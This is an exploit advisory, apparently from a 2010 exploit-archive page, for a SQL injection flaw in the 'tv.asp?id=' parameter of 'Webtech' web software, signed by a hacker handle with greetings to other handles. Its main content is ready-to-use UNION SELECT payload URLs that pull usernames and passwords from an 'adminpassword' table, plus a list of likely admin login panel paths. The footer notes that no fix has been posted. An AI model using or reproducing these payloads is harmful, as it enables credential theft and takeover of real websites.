Webtech (tv.asp id) SQL Injection Vulnerability

2010-05-11 09:31:35

#################################################################
# a4security.blogspot.com | www.1923Turk.Com
############################A4###################################
A information;
4 Name: Webtech (tv.asp?id=) SQL Injection Vulnerability
# Auth0r: Attack3r
#################################################################
A Vulnerability Info;
4 Type: Sql İnjection Vulnerability
# Risk: Medium
############################A4###################################
[Exploit] :

http://Attack3r/tv.asp?id=1+union+select+0+from+adminpassword

[Panel] :

http://Attack3r/controlpanel/login.asp << Usally ..
http://Attack3r/admin/login.asp
http://Attack3r/login/login.asp

[p0c] :

http://Attack3r/tv.asp?id=-1+union+select+1,2,username,pw,5,6,7,8,9,10,11+from+adminpassword
#############################A4##################################
A
4 Republic Of Turkey
# Attack3r
#############################A4##################################
#Greetz;
#HaCkSpY, Black-Wolf,

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.